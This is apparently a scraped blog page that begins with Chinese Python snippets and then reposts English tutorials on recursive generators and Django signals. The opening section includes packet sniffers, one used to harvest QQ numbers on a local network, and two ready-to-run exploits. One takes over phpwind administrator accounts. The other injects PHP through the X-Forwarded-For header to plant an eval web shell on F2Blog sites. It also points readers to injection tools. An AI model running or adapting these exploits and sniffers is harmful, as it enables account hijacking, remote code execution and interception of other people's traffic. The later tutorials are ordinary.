regx=r'/[\w+|/]+.flv|/[\w+|/]+.swf'
urls=[]
hosts=[]
print 'start capture....'
for recv_time,recv_data in pack:
urls=re.findall(regx,recv_data);
if(len(urls)!=0):print urls;

2、嗅探qq号码,前些天我还用它嗅探局域网里所有的qq那。可惜没有识别性别的功能。不过可以自己添加

# -*- coding: cp936 -*-
import pcap ,struct
pack=pcap.pcap()
pack.setfilter('udp')
key=''
for recv_time,recv_data in pack:
recv_len=len(recv_data)
if recv_len == 102 and recv_data[42]== chr(02) and recv_data[101]
== chr(03):
print struct.unpack('>I',recv_data[49:53])[0]
elif recv_len == 55:
print struct.unpack('>I',recv_data[49:53])[0]

3、数据嗅探,项目中遇到,需要嗅探一些发送到特定端口的数据,于是花了几分钟写了一个程序。

import pcap ,struct
from pickle import dump,load
pack=pcap.pcap()
pack.setfilter('port 2425')
f=open(r'/mm.txt','w+')
print 'start capture....'
for recv_time,recv_data in pack:
print recv_time
print recv_data
f.write(recv_data)

3、5 文件内容搜索,我发现windows的自带的搜索无法搜索内容。即使搜索到也不准。就自己写了一个

import os,string,re,sys

class SevenFile:
files=[]
def FindContent(self,path):
print 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
walks=os.walk(path)
for walk in walks:
for filename in walk[2]:
if('.mht' == filename[-4:]):
res_taskid=[]
file=walk[0]+'\\'+filename
f=open(file)
content=f.read()
pattern_taskid=re.compile(r'Stonehenge-UIVerificationChecklist\.mht',re.IGNORECASE) #
res_taskid=pattern_taskid.findall(content)
f.close()
if len(res_taskid)>0:
self.files.append(file)

def run():
f=SevenFile()
f.FindContent(r"E:\work\AP\Manual Tests\PSIGTestProject\PSIGTestProject")
for filepath in f.files:
print filepath
print "OK"

if __name__=="__main__":
run()

4、这个不是我写的,是一个网上的攻击phpwind论坛的一个代码

# -*- coding: gb2312 -*-
import urllib2,httplib,sys
httplib.HTTPConnection.debuglevel = 1
cookies = urllib2.HTTPCookieProcessor()
opener = urllib2.build_opener(cookies)

def usage():
print "Usage:\n"
print " $ ./phpwind.py pwforumurl usertoattack\n"
print " pwforumurl 目标论坛地址如http://www.80sec.com/"
print " usertoattack 目标拥有权限的斑竹或管理员"
print " 攻击结果将会在目标论坛注册一个和目标用户一样的帐户"
print " 最新版本可以使用uid登陆"
print " 其他版本可以使用cookie+useragent登陆"
print "########################################################"
print ""

argvs=sys.argv
usage()

data = "regname=%s
%s1&regpwd=@80sec&regpwdrepeat=@80sec&regemail=...@foo.com&regemailtoall=1&step=2"
% (argvs[2],"%c1")
pwurl = "%s/register.php" % argvs[1]

request = urllib2.Request(
url = pwurl ,
headers = {'Content-Type' : 'application/x-www-form-
urlencoded','User-Agent': '80sec owned this'},
data = data)
f=opener.open(request)
headers=f.headers.dict
cookie=headers["set-cookie"]
try:
if cookie.index('winduser'):
print "Exploit Success!"
print "Login with uid password @80sec or Cookie:"
print cookie
print "User-agent: 80sec owned this"
except:
print "Error! http://www.80sec.com"
print "Connect root#80sec.com"

5、黑客注入攻击,针对指定网站的注入演示

#!c:\python24\pyton
# Exploit For F2Blog All Version
# Author BY MSN:pt...@vip.sina.com
# Date: Jan 29 2007

import sys
import httplib
from urlparse import urlparse
from time import sleep

def injection(realurl,path,evil): #url,/bk/,evilip
cmd=""
cookie=""
header={'Accept':'*/*','Accept-Language':'zh-
cn','Referer':'http://'+realurl[1]+path+'index.php','Content-
Type':'application/x-www-form-urlencoded','User-
Agent':useragent,'Host':realurl[1],'Content-length':len(cmd),
'Connection':'Keep-Alive','X-Forwarded-
For':evil,'Cookie':cookie}
#cmd =
"formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=
%E6%8F%90+%C2%A0+%E4%BA%A4"
#print header
#print path
#sys.exit(1)
http = httplib.HTTPConnection(realurl[1])
http.request("POST",path+"index.php",cmd, header)
sleep(1)
http1 = httplib.HTTPConnection(realurl[1])
http1.request("GET",path+"cache/test11.php")
response = http1.getresponse()
re1 = response.read()
#print re1
print re1.find('test')
if re1.find('test') ==0:
print 'Expoilt Success!\n'
print 'View Your shell:\t%s' %shell
sys.exit(1);

else:
sys.stdout.write("Expoilt FALSE!")
http.close()
#sleep(1)
#break
sys.stdout.write("\n")

def main ():
print 'Exploit For F2Blog All Version'
print 'Codz by pt...@vip.sina.com\n'
if len(sys.argv) == 2:
url = urlparse(sys.argv[1])
if url[2:-1] != '/':
u = url[2] + '/'
else:
u = url[2] #u=/bk/
else:
print "Usage: %s " % sys.argv[0]
print "Example: %s http://127.0.0.1/bk" % sys.argv[0]
sys.exit(0)

print '[+] Connect %s' % url[1]
print '[+] Trying...'
print '[+] Plz wait a long long time...'
global shell,useragent
shell="http://"+url[1]+u+"cache/test11.php"
query ='fputs(fopen(\'cache/test11.php\',\'w+\'),\'@eval($_REQUEST[c])?>test\')'
query ='\'));'+query+';/*'
evilip=query
useragent=""
cookie=""
injection(url,u,evilip)
evilip=""
injection(url,u,evilip)

print '[+] Finished'

if __name__ == '__main__': main()

6、黑客注入攻击,这是一个完整的access+asp注入工具。
代码有点长,自己下载吧。

http://www.xfocus.net/tools/200408/780.html

国外还有更厉害的python注入工具(sqlmap),支持现在基本上所有的数据库。 MySQL, Oracle, PostgreSQL and Microsoft SQL
Server database management system back-end. Besides these four DBMS,
sqlmap can also identify Microsoft Access, DB2, Informix and Sybase;

自己搜索下载吧。

支持get,post ,cookie注入。可以添加cookie和user-agent
支持盲注,错误回显注入,还有其他多种注入方法。
支持代理,
优化算法,更高效。
指纹识别技术判断数据库

Wednesday, October 22, 2008

Python|Recursion and Generators

Recursion and Generators

[Japanese]

Abstract: A certain kind of problems can be described with recursive procedures quite efficiently. But sometime you need strict control over recursive procedures which produces a huge amount of data, which adds difficulty to coding. Python generators, which are available in Python 2.2 or later, allows us to control these procedures easily preserving concise programs.

The source code mentioned in this document is here. The plain text version is here.


Introduction

No one doubts the power of recursion. Although it sometime might look a little bit complicated, it normally provides a quick way to describe a solution. This is especially true if the size of data handled by a procedure grows exponentially. Traversing a tree is a good example. Since each node in a tree has one or more nodes, as the procedure goes down the tree, the number of nodes grows in exponential order. But if all nodes are homogeneous, the same procedure can apply to every node again and again.

Tree traversal is a trivial example of recursion, because almost every Computer Science textbook explains this. Probably everyone will happily choose recursion for tree traversal without any deep consideration. Of course however, there are many tasks where recursion works pretty well. So let us take another example.

Consider the following function f which takes a set of vectors (V1, V2, V3, ... , Vn) and returns a set of all possible combinations of each element of Vi. Each combination consists of n-element vectors (xi1, xi2, ... , xim) where xij is an element of Vi. The total number of vectors this function returns is |V1| x |V2| x |V3| x ... x |Vn|.

Let us consider implementing this function in Python. For simplicity, we use String objects to represent each vector Vi. The function returns a set of vectors as a list. The expected result is the following:

f([]) --> ['']  # 1
f(['abc']) --> ['a', 'b', 'c'] # 3
f(['abc', 'xyz']) --> ['ax', 'ay', 'az', 'bx', 'by', 'bz', 'cx', 'cy', 'cz'] # 9
f(['abc', 'xyz', '123']) --> ['ax1', 'ax2', 'ax3', 'ay1', 'ay2', 'ay3', 'az1', 'az2', 'az3',
'bx1', 'bx2', 'bx3', 'by1', 'by2', 'by3', 'bz1', 'bz2', 'bz3',
'cx1', 'cx2', 'cx3', 'cy1', 'cy2', 'cy3', 'cz1', 'cz2', 'cz3'] # 27

At a first glance, it looks easy to implement. You might think that this function can be written easily without using any recursion. Let's try.


Solutions

First, if you don't want to use recursion at all, your program might end up with something like this:

Non-recursive Version

def f0(args):
counter = [ 0 for i in args ]
r = []
while 1:
r.append("".join([ arg1[i] for arg1,i in zip(args, counter) ]))
carry = 1
x = range(len(args))
x.reverse() # x == [len(args)-1, len(args)-2, ..., 1, 0]
for i in x:
counter[i] += 1
if counter[i] < len(args[i]):
carry = 0
break # leave "for"
counter[i] = 0
else:
break # leave "while"
return r

Without using recursion, you have to remember intermediate states somehow to produce all possible solutions. In this program, I tried to emulate something like full-adders. First the program prepares a list of integers and then repeatedly attempts to add one to the least significant digit. At each iteration, it concatenates elements in each argument and put it into variable r. But the behavior of this program is not so clear, even though some variable names such as "carry" are suggestive.

Recursive Version

Now you have recursion. The function f can be defined recursively as follows:

f(Vi, Vi+1, ... , Vn) = ({xi1} + f(Vi+1, ... , Vn)) +

({xi2} + f(Vi+1, ... , Vn)) +

...

({xim} + f(Vi+1, ... , Vn)) .

With this definition, you can make the program a much simpler by calling itself:

def fr(args):
if not args:
return [""]
r = []
for i in args[0]:
for tmp in fr(args[1:]):
r.append(i + tmp)
return r

The implementation above is very straightforward. The power of recursion is that you can split the problem into several subproblems and apply the exactly same machinery to each subproblem. This program simply takes the first element of each argument and concatenate it with every solution of this function with one fewer arguments (Fig 1).


Fig 1. Recursive Version

More Solutions

So far we have seen functions which return all the results at a time. But in some applications such as searching or enumerating, you probably don't want to remember all combinations. What you want to do is just to inspect one combination at each time, and throw away after using it.

When the number of outputs is small, this is not a big deal. But what we expected for recursive procedures is to provide a quick solution for functions whose result grows exponentially, right? Ironically, however, such functions tend to produce a huge amount of data that cause problems in your program. In many language implementations, they cannot remember all the results. Sooner or later it will reach the maximum limit of the memory:

$ ulimit -v 5000
$ python
...
>>> for x in fr(["abcdefghij","abcdefghij","abcdefghij","abcdefghij","abcdefghij"]):
... print x
...
Traceback (most recent call last):
File "", line 1, in ?
File "", line 7, in fr
MemoryError

The typical solution for this is to split every combination into different states. The typical way to do this in Python is to build an iterator.

Iterator Version

In Python, a class which has a __iter__ method can be used as iterators. Although iterators are not functionally identical to lists, they can be taken instead of lists in some statements or functions (for, map, filter, etc).

class fi:
def __init__(self, args):
self.args = args
self.counter = [ 0 for i in args ]
self.carry = 0
return

def __iter__(self):
return self

def next(self):
if self.carry:
raise StopIteration
r = "".join([ arg1[i] for arg1,i in zip(self.args, self.counter) ])
self.carry = 1
x = range(len(self.args))
x.reverse() # x == [len(args)-1, len(args)-2, ..., 1, 0]
for i in x:
self.counter[i] += 1
if self.counter[i] < len(self.args[i]):
self.carry = 0
break
self.counter[i] = 0
return r

# display
def display(x):
for i in x:
print i,
print
return

In this program, you can use the constructor of the class fi in the same manner as the recursive version fr as in:

>>> display(fi(["abc","def"])) 

When this instance is passed to a for statement, the __iter__ method is called and the returned object (the object itself in this case) is used as the iterator of the loop. At each iteration, the next method is called without argument and the return value is stored in the loop variable.

However, this program is not easy to understand. Algorithmically, it is similar to the non-recursive version I described above. Each time next method is called, it updates the current state stored in counter variable and returns one result according to the current state. But it looks even more complicated, since the method is designed to be called in between a loop, which is not shown explicitly here. Readers might be upset by seeing that it checks carry variable at the top of the next procedure. They have to imagine an (invisible) loop outside this method to understand this.

Generator Version

Now we have generators. The program gets much simpler:
def fg(args):
if not args:
yield ""
return
for i in args[0]:
for tmp in fg(args[1:]):
yield i + tmp
return
Note that this is not only simpler than the iterator version, but also even simpler than the original version with recursion. With generators, we can simply throw (or "yield") results one at a time, and forget them after that. It is just like printing results to a stream device. You don't have to really care about preserving states. All you have to do is just to produce all results recklessly, and still you can have strict control over that procedure. You might notice that the similar function can be realized with lazy evaluation, which is supported in some functional languages. Although lazy evaluation and generators are not exactly same notion, both of them facilitate to handle the same situation in a different kind of form.

Lambda-encapsulation Version

Perhaps functional programmers might prefer lambda encapsulation to objects. Python also allows us to do this. In fact, however, this was a real puzzle to me. I could do things in the same manner as I did the iterator version. But I wanted to do something different. After hours of struggles, I finally came up with something like this:

def fl(args, i=0, tmp="", parent_sibling=None):
if not args:
# at a leaf
return (tmp, parent_sibling)
if i < len(args[0]):
# prepare my sibling
sibling = fl(args, i+1, tmp, parent_sibling)
return lambda: fl(args[1:], 0, tmp+args[0][i], sibling)
else:
# go up and visit the parent's sibling
return parent_sibling

# traverse function for lambda version
def traverse(n):
while n:
if callable(n):
# node
n = n()
else:
# leaf
(result, n) = n
print result,
print

The idea is indeed to take it as tree traversal. The function f can be regarded as a tree which contains a partial result at each node (Fig 2). A function produced by fl retains its position, the next sibling node, and the next sibling of the parent node in the tree. As it descends the tree, the elements of the vectors are accumulated. When it reaches at a leaf it should have one complete solution (a combination of elements). If there is no node to traverse in the same level, it goes back to the parent node and tries the next sibling of the parent node. We need a special driver routine to traverse the tree.


Fig 2. The Function f as Tree Traversal

Of course the generator version can be also regarded as tree traversal. In this case, you will be visiting a tree and dropping a result at each node.


CHANGES:
Jun 1, 2003: Released.
Jun 7, 2003: A small update based on the comments by Eli Collins.

Tuesday, October 21, 2008

Django|Signals in Django: Stuff That’s Not Documented (Well)

Ref From URL:http://www.chrisdpratt.com/2008/02/16/signals-in-django-stuff-thats-not-documented-well/

I’ve just spent the last few hours learning how to use signals in Django. After many, many searches on Google and much trial and error, I think I finally have a grasp on these silly things, and since I’m an all around nice guy, I’m going to spare those lucky few that happen upon this post the same hell.

Before I start, I want to go ahead and give credit to those who provided some of the crucial pieces to the puzzle during my quest.

Okay, now let’s get started.

Creating Custom Signals

In the application I’m working on, I needed to send an email whenever a user reset his/her password, a pretty common use case. Unfortunately, none of Django’s built-in signals fit the bill. The User model gets saved when the password is reset (allowing the use of the post_save signal), but it also gets saved in a lot of other scenarios. The password reset is a special case and needed to be handled as such.

Turns out that it’s actually not that difficult to set this up. If you haven’t already, create a file named signals.py in directory of the application you’re working on. Then in that file, add the following:

  1. # myapp/signals.py
  2. password_reset = object()

The name `password_reset` is inconsequential; use whatever name best conveys the action that causes the signal to be sent.

Next, set up a listener for that signal. The following code can technically go just about anywhere, as long as it gets executed before the signal is sent. I put it in models.py for ease.

  1. # myapp/models.py
  2. from django.dispatch import dispatcher
  3. from myproject.myapp import signals as custom_signals
  4. ...
  5. dispatcher.connect(send_password_reset_email, signal=custom_signals.password_reset)

`send_password_reset_email` is the function that will be called when the signal is received. Obviously, we’ll need to set that up. Back to signals.py:

  1. # myapp/signals.py
  2. from django.conf import settings
  3. from django.core.mail import send_mail
  4. from django.contrib.sites.models import Site
  5. from django.template.loader import render_to_string
  6. ...
  7. def send_password_reset_email(sender, user, new_pass, signal, *args, **kwargs):
  8. current_site = Site.objects.get_current()
  9. subject = "Password Reset on %(site_name)s" % { 'site_name': current_site.name }
  10. message = render_to_string(
  11. 'account/password_reset_email.txt',
  12. { 'username': user.username,
  13. 'new_pass': new_pass,
  14. 'current_site': current_site }
  15. )
  16. send_mail(subject, message, settings.DEFAULT_FROM_EMAIL, [user.email])

Exactly how this code works is left as an exercise to the reader. I provided it merely to be comprehensive. What the function that gets called when the signal is received does will be specific to your purposes.

However, there are a few points worth mentioning. When you use Django’s built-in signals, your function definition will almost invariably look like the following:

  1. def my_function(sender, instance, signal, *args, **kwargs):

Notice that my definition didn’t include `instance` and had `user` and `new_pass` arguments instead. You can pass whatever arguments you like when you send the signal (we’ll get to this in a second). The only requirement is that the function that gets called can handle them. Django simply chose to use an argument named `instance`, nothing more, nothing less.

Finally, at the exact point where you want function associated with the signal executed (in my case, right after a new password is generated and the User instance is saved) insert the following:

  1. dispatcher.send(signal=custom_signals.password_reset, user=self.user, new_pass=new_pass)

The only required part is obviously the signal you want to send. Everything after is simply data you’d like to pass along. Remember that the function definition in signals.py must accept all the arguments you choose to pass in.

Also don’t forget to add the following to your imports in the file where you call dispatcher.send():

  1. from django.dispatch import dispatcher
  2. from myproject.myapp import signals as custom_signals

And we’re done. Easy as pie, once you know what you’re doing.

Signaling Just When an Object is Created

Conspicuously missing from Django’s built-in signals is one for the creation of an object. We have pre_save and post_save signals, but both of those work whether the object is being created or just being updated.

Again, finding a solution to this little issue was spurred by my own needs. I wanted to send a welcome email when a user first registers, another common use case. Obviously, I didn’t want the same welcome email sent everytime the user updates their details so post_save was out. Or was it?

After a fair amount of digging, I found the solution squirreled away in Django’s model tests. Apparently, Django automagically passes in a `created` flag if the object was created, so all that’s required is to test for that flag before you whatever you plan on doing (sending the welcome email in my case).

  1. def send_welcome_email(sender, instance, signal, *args, **kwargs):
  2. if 'created' in kwargs:
  3. if kwargs['created']:
  4. # Send email

First, we test that a `created` argument was passed in. If it was, we verify that it’s value is True.

Finally, set up a listener as usual. Again, where you put it matters not as long as it gets executed before the signal gets sent; models.py is a good place.

  1. # myapp/models.py
  2. from django.dispatch import dispatcher
  3. from django.db.models import signals
  4. ...
  5. dispatcher.connect(send_welcome_email, signal=signals.post_save, sender=UserProfile)

The `sender` argument limits the signal to being sent only for that particular model. I chose to send it upon the creation of UserProfile, the profile module associated with User in my app. If you left this part out, our send_welcome_email function would be called everytime any model in your application was saved, which would obviously not be desirable.

And, just like that, you get code that will only execute when the model is first created.

Handling Signals Asynchronously

Both of the above examples send emails. It normally doesn’t take much time to send an email, but if the server load is heavy, it could take longer than normal. Ideally, anytime you do anything like this, you want it to be done asynchronously so that users don’t have to wait for the processing to finish before they can move on to something else.

Django’s signals provide half the functionality by decoupling the code for sending the email from the view. However, by default, Django’s signals are synchronous; the signal gets sent and the application waits for its successful completion before moving on. Thankfully, Python has the answer in its threading module.

A thread, extremely simplified, can be thought of as a branch of a running program (Django in this case). It becomes its own entity, able to run independently of its parent process. Extremely simplified, again, you could think of it as a little mini-Django tasked with a very specific and finite purpose. Once it completes its function, it goes away. This purchases us the ability to let something run, while still continuing on in our application in general.

While it sounds rather complicated, it’s actually relatively easy to set up. The following is the actual code I’m using for the welcome email discussed earlier:

  1. import threading
  2. ...
  3. class WelcomeEmailThread(threading.Thread):
  4. def __init__(self, instance):
  5. self.instance = instance
  6. threading.Thread.__init__(self)
  7. def run (self):
  8. # The actual code we want to run, i.e. sending the email
  9. def send_welcome_email(sender, instance, signal, *args, **kwargs):
  10. if 'created' in kwargs:
  11. if kwargs['created']:
  12. WelcomeEmailThread(instance).start()

First, we create a new class which subclasses threading.Thread. The name of the class is inconsequential; just pick something descriptive. In this class, we have two functions defined: `__init__` and `run`.

The `__init__` function is provided to allow us to pass in the instance we received from the signal. We store the instance as an attribute so it can be retrieved later, and then we call the `__init__` method on threading.Thread. This is necessary because we have overloaded (replaced) the `__init__` function inherited from threading.Thread, but we did not replace all of its functionality as well. Therefore, it still needs to complete its normal initialization procedures.

The `run` function is the heart of the class. This is where the email sending will now occur.

Finally, in the `send_welcome_email` function, which previously housed the code for sending the email, we now start the thread instead. The `if` statements are just specifying that this code should only run if the object is being created instead of updated (see previous topic).

That’s all that’s required. Now, when the signal is received it will simply spawn off a thread to send the email and return processing back to the rest of our application. Not bad at all.

Wrap Up

That’s all I’ve got for now, but I think it covers the three most confusing areas of Django’s signals. Happy Django’ing.